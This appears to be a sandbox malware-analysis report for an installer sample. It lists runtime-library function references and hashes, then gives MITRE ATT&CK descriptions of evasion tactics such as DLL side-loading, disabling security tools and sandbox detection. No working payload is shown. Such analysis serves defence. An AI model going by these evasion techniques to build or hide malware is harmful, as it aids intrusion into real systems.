Part of subcall function 00DC979C: __getptd_noexit.LIBCMT ref: 00DC979F
Part of subcall function 00DC979C: __amsg_exit.LIBCMT ref: 00DC97AC

__getptd.LIBCMT ref: 00DC79D3
__getptd.LIBCMT ref: 00DC79E1
__getptd.LIBCMT ref: 00DC79EC
_CallCatchBlock2.LIBCMT ref: 00DC7A12

Part of subcall function 00DC48E7: __CallSettingFrame@12.LIBCMT ref: 00DC4933

Part of subcall function 00DC7AB9: __getptd.LIBCMT ref: 00DC7AC8
Part of subcall function 00DC7AB9: __getptd.LIBCMT ref: 00DC7AD6

Memory Dump Source

Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: e6262efbf070ded7b777bfe04af5a68fe5dcba89eb03d81db9f279e90690c771
Instruction ID: d7b05a6ba7279795822dfeef6a0772ae543baa987ccdefc939532b62d3830bbd
Opcode Fuzzy Hash: e6262efbf070ded7b777bfe04af5a68fe5dcba89eb03d81db9f279e90690c771
Instruction Fuzzy Hash: 6C11B3B5C0520A9FDF00EFA4D446BADBBB0FF08314F15846AE858A7291DB389A159F64

Function 00DCD224 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00DCD230

Part of subcall function 00DC979C: __getptd_noexit.LIBCMT ref: 00DC979F
Part of subcall function 00DC979C: __amsg_exit.LIBCMT ref: 00DC97AC

__amsg_exit.LIBCMT ref: 00DCD250
__lock.LIBCMT ref: 00DCD260
InterlockedDecrement.KERNEL32(?), ref: 00DCD27D
_free.LIBCMT ref: 00DCD290
InterlockedIncrement.KERNEL32(00F61670), ref: 00DCD2A8

Memory Dump Source

Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: c634510cb64d07aad8e99cca58c0449d09da63e3e475410df3f9f64a450c0364
Instruction ID: aff2af312aed94b9252006474dfb216c7a71256be40649a7e519a16f407bb62f
Opcode Fuzzy Hash: c634510cb64d07aad8e99cca58c0449d09da63e3e475410df3f9f64a450c0364
Instruction Fuzzy Hash: 86015E32901723ABCB20AF649C06F59B3A1AB40761F19402EE815A7391CB74E942CBB9

Function 00DC1B06 Relevance: 9.0, APIs: 6, Instructions: 46COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DC1B0B
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00DC1B1F

Part of subcall function 00DC32F5: _setlocale.LIBCMT ref: 00DC3307

_free.LIBCMT ref: 00DC1B2D

Part of subcall function 00DC4452: HeapFree.KERNEL32(00000000,00000000,?,00DC3C7B,?,?,00DC101C), ref: 00DC4468
Part of subcall function 00DC4452: GetLastError.KERNEL32(?,?,00DC3C7B,?,?,00DC101C), ref: 00DC447A

_free.LIBCMT ref: 00DC1B3F
_free.LIBCMT ref: 00DC1B51
_free.LIBCMT ref: 00DC1B63

Memory Dump Source

Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd

Similarity

API ID: _free$ErrorFreeH_prologHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
String ID:
API String ID: 770894815-0
Opcode ID: 6ff7b9a73a924fdf3c0061c6bb616656d54ce5021f5ee586f560a33c0fe690a7
Instruction ID: 774b30be1d52da9aa2b38a1325ba7e338d9353ee05ac79c51876b534bd40b830
Opcode Fuzzy Hash: 6ff7b9a73a924fdf3c0061c6bb616656d54ce5021f5ee586f560a33c0fe690a7
Instruction Fuzzy Hash: A9014835600B129ADB28AB68D816F9BB3E8FF02724F14C51EE065D7581DBB8DA048E74

Function 00DC153B Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 00DC155A
std::exception::exception.LIBCMT ref: 00DC157C

Strings

ios_base::eofbit set, xrefs: 00DC1578, 00DC15B4
ios_base::badbit set, xrefs: 00DC156E
ios_base::failbit set, xrefs: 00DC15A4

Memory Dump Source

Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3728558374-1866435925
Opcode ID: ed6dd9adde4d72bb086bf8462dad22d1ab2727a14a7e23b111b642967d49f5f8
Instruction ID: 9156ce8f764e3c732697d23d0ff038b53a2bdd06155bb88d553a0d6039290ea8
Opcode Fuzzy Hash: ed6dd9adde4d72bb086bf8462dad22d1ab2727a14a7e23b111b642967d49f5f8
Instruction Fuzzy Hash: B2015EB582021AAFCB00EFA88416FADBBF49B81314F64C11EA5569B342D675CA15CF71

Function 00DC7D40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 00DC7D53

Part of subcall function 00DC7CAE: ___BuildCatchObjectHelper.LIBCMT ref: 00DC7CE4

_UnwindNestedFrames.LIBCMT ref: 00DC7D6A
___FrameUnwindToState.LIBCMT ref: 00DC7D78

Strings

csm, xrefs: 00DC7D4F, 00DC7D64, 00DC7D77, 00DC7D95, 00DC7DA5
csm, xrefs: 00DC7D42

Memory Dump Source

Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm$csm
API String ID: 2163707966-3733052814
Opcode ID: 6c894a3f2729321d8e37f772740de334ea6d335cc87a979b471e5224e4f7bb87
Instruction ID: 9e7e6da2b07bea780b7b1d427752c43318c49c544b28b4221f43a037081984b1
Opcode Fuzzy Hash: 6c894a3f2729321d8e37f772740de334ea6d335cc87a979b471e5224e4f7bb87
Instruction Fuzzy Hash: B501E47140510ABBDF126F91CC45FAA7F6AFF08360F144418BD5916161D73299A2DFB1

Function 00DCDE68 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00DCDE76

Part of subcall function 00DC729E: __FF_MSGBANNER.LIBCMT ref: 00DC72B7
Part of subcall function 00DC729E: __NMSG_WRITE.LIBCMT ref: 00DC72BE
Part of subcall function 00DC729E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00DC63C9,00000000,00000001,00000000,?,00DCB742,00000018,00DDD728,0000000C,00DCB7D2), ref: 00DC72E3

_free.LIBCMT ref: 00DCDE89

Memory Dump Source

Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 94c14c1ecd6810ee7e6c4cc9fc838cc5f4fd2567ac68d0b3c7ee471523746f6a
Instruction ID: aa2075578a70ebd6907507175705722e1d38928646eac4a82bf933342110a1ee
Opcode Fuzzy Hash: 94c14c1ecd6810ee7e6c4cc9fc838cc5f4fd2567ac68d0b3c7ee471523746f6a
Instruction Fuzzy Hash: A91186324056179BCB217F74AD06F5A379ADB54370B25453EF8D99F151DE30C8418AB1

Function 00DCD9A5 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00DCD9B1

Part of subcall function 00DC979C: __getptd_noexit.LIBCMT ref: 00DC979F
Part of subcall function 00DC979C: __amsg_exit.LIBCMT ref: 00DC97AC

__getptd.LIBCMT ref: 00DCD9C8
__amsg_exit.LIBCMT ref: 00DCD9D6
__lock.LIBCMT ref: 00DCD9E6
__updatetlocinfoEx_nolock.LIBCMT ref: 00DCD9FA

Memory Dump Source

Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 2957e8cae91b38b060855a1495a1baf2ee78d3f64f8a29beaab72eb39eece3d8
Instruction ID: 2d5cab71c728bdf21139ff967290be25dd14d7328b0f9a1978f46a5af0a0d95c
Opcode Fuzzy Hash: 2957e8cae91b38b060855a1495a1baf2ee78d3f64f8a29beaab72eb39eece3d8
Instruction Fuzzy Hash: DCF0CD329403028EDB20BB789C07F0D77A1EF00324F19012EF404AB2C2CF3489408E7A

Function 00DC262B Relevance: 6.2, APIs: 4, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be357738b88aa32033e959664d9c4edef258d5b3ed29f6baf06f5e8104f1148c
Instruction ID: e7cf0a93d214a3c06a807417978d6b7fd601eb99317c64ef813a751daca3ecbf
Opcode Fuzzy Hash: be357738b88aa32033e959664d9c4edef258d5b3ed29f6baf06f5e8104f1148c
Instruction Fuzzy Hash: 34514A7590061AAFCB14DBA8C9D1EBEB7F9EF09314B24056EE542A7681D770AE44CB30

Function 00DC5513 Relevance: 6.1, APIs: 4, Instructions: 130COMMONLIBRARYCODE

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00DC55AE
__flush.LIBCMT ref: 00DC55CC
__write.LIBCMT ref: 00DC55F3
__flsbuf.LIBCMT ref: 00DC561E

Part of subcall function 00DCA95F: __getptd_noexit.LIBCMT ref: 00DCA95F

Memory Dump Source

Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 214febab279902aaaf85238c35f9e5b7d000cfacc0f7fa1f8ded75630d6de8c4
Instruction ID: 356663d4461bcb3da8f97ad4d53e6eb0d4f3e21815bf903fb4b7abff2888356d
Opcode Fuzzy Hash: 214febab279902aaaf85238c35f9e5b7d000cfacc0f7fa1f8ded75630d6de8c4
Instruction Fuzzy Hash: 9B41D331A10A069BDB248F69A845F9EB7B2EF80360F28852DE45697184D770FD818B70

Function 00DD3BE5 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00DD3C19
__isleadbyte_l.LIBCMT ref: 00DD3C4C
MultiByteToWideChar.KERNEL32(00000080,00000009,00001000,?,00000000,00000000,?,?,?), ref: 00DD3C7D
MultiByteToWideChar.KERNEL32(00000080,00000009,00001000,00000001,00000000,00000000,?,?,?), ref: 00DD3CEB

Memory Dump Source

Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 007f233f12e4d401b35f9c19d35bef1efdfb9c698dc10272da9be4adecb03f7e
Instruction ID: d1a4b0b5a70fc5f23ae5ddf901709246ecfd41ab0ad5367dba9c4a37aacfe0d7
Opcode Fuzzy Hash: 007f233f12e4d401b35f9c19d35bef1efdfb9c698dc10272da9be4adecb03f7e
Instruction Fuzzy Hash: 2E318431A11286EFDB10DF6CC885AB97BB5FF01310F19856AE461AB291D730DE50DB72

Function 00DC913A Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00DC9160

Part of subcall function 00DC8F8C: __fltout2.LIBCMT ref: 00DC8FB7

__cftog_l.LIBCMT ref: 00DC9186
__cftoe_l.LIBCMT ref: 00DC91B8

Memory Dump Source

Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 7abab7f37374930e6b8407cddf865f45a75f3ddd1c41e9d093c28a370de47b44
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: 63116D7605024BBBCF125E84CC1ADEE7F22BF18390B198559FA185A020C736C9B1ABA1

Function 00DC168B Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

_wprintf.LIBCMT ref: 00DC169D
_wprintf.LIBCMT ref: 00DC16B5
_wprintf.LIBCMT ref: 00DC16CD
_wprintf.LIBCMT ref: 00DC16E5

Memory Dump Source

Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd

Similarity

API ID: _wprintf
String ID:
API String ID: 2738768116-0
Opcode ID: b951b53b610f204f602ccb8d6b4c4e3fbf5bce1fe961bc3177876232da16b173
Instruction ID: 61411fed2fc8e0e5925d7d1dc7f9d4b447242d68ca0abeaa6a5d94df51ac3734
Opcode Fuzzy Hash: b951b53b610f204f602ccb8d6b4c4e3fbf5bce1fe961bc3177876232da16b173
Instruction Fuzzy Hash: 00F0A7279C91332D953C30A6242AF87CF40EB03BF0725102FB8CCA31C21982084680F8

Function 00DC35C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00DC35E5

Part of subcall function 00DC38C7: std::exception::exception.LIBCMT ref: 00DC38DC
Part of subcall function 00DC38C7: __CxxThrowException@8.LIBCMT ref: 00DC38F1

Part of subcall function 00DC2279: std::_Xinvalid_argument.LIBCPMT ref: 00DC228A

_memmove.LIBCMT ref: 00DC3640

Strings

invalid string position, xrefs: 00DC35E0

Memory Dump Source

Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$Exception@8Throw_memmovestd::exception::exception
String ID: invalid string position
API String ID: 1253240057-1799206989
Opcode ID: c3a0daec1f03e2089644a925084b3fdfdd920bedc70c0482ee2761fe216445d7
Instruction ID: e170c21fb1591059061cfef6d2302301ed79a934f2019bd994789cfa72a5143b
Opcode Fuzzy Hash: c3a0daec1f03e2089644a925084b3fdfdd920bedc70c0482ee2761fe216445d7
Instruction Fuzzy Hash: 3B11C131344312ABCB299E1C9851F6AB3A5EB95720F14892EF9568B381CB71DB01C7B5

Function 00DC215B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00DC2171

Part of subcall function 00DC38C7: std::exception::exception.LIBCMT ref: 00DC38DC
Part of subcall function 00DC38C7: __CxxThrowException@8.LIBCMT ref: 00DC38F1

_memmove.LIBCMT ref: 00DC21AA

Strings

invalid string position, xrefs: 00DC216C

Memory Dump Source

Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argument_memmovestd::_std::exception::exception
String ID: invalid string position
API String ID: 22950630-1799206989
Opcode ID: e955b81102d2ca65dbda9df060c8efa10bda729f95040e2f1683bd1ffde7f171
Instruction ID: 4bf8998928ba3cf0c083fc87d3bb7d6828080e42484dcfd9b19bb143080d4331
Opcode Fuzzy Hash: e955b81102d2ca65dbda9df060c8efa10bda729f95040e2f1683bd1ffde7f171
Instruction Fuzzy Hash: C301B5313007525BD7249E6CDCC0E3AB7E6EB807107284D3DE68187645DB70EC4687B0

Function 00DC7AB9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00DC4895: __getptd.LIBCMT ref: 00DC489B
Part of subcall function 00DC4895: __getptd.LIBCMT ref: 00DC48AB

__getptd.LIBCMT ref: 00DC7AC8

Part of subcall function 00DC979C: __getptd_noexit.LIBCMT ref: 00DC979F
Part of subcall function 00DC979C: __amsg_exit.LIBCMT ref: 00DC97AC

__getptd.LIBCMT ref: 00DC7AD6

Strings

csm, xrefs: 00DC7AE4

Memory Dump Source

Source File: 00000000.00000002.4497588814.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.4497574073.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497608514.0000000000DD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497624394.0000000000DDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4497640647.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_33-o_Installer.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 9be489d9b2c9357c481f46e0d1185517e740e94918750dde5ba21505126bd088
Instruction ID: c49a1ee8e90e420af1fa5e6a29bbafc84d70c2ff29dfdcc81a2e83cf6e88194e
Opcode Fuzzy Hash: 9be489d9b2c9357c481f46e0d1185517e740e94918750dde5ba21505126bd088
Instruction Fuzzy Hash: 2F012C398062068ACF359F62C458FADB7BAEF14311F68482EE051575A1CB308D81CE31

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
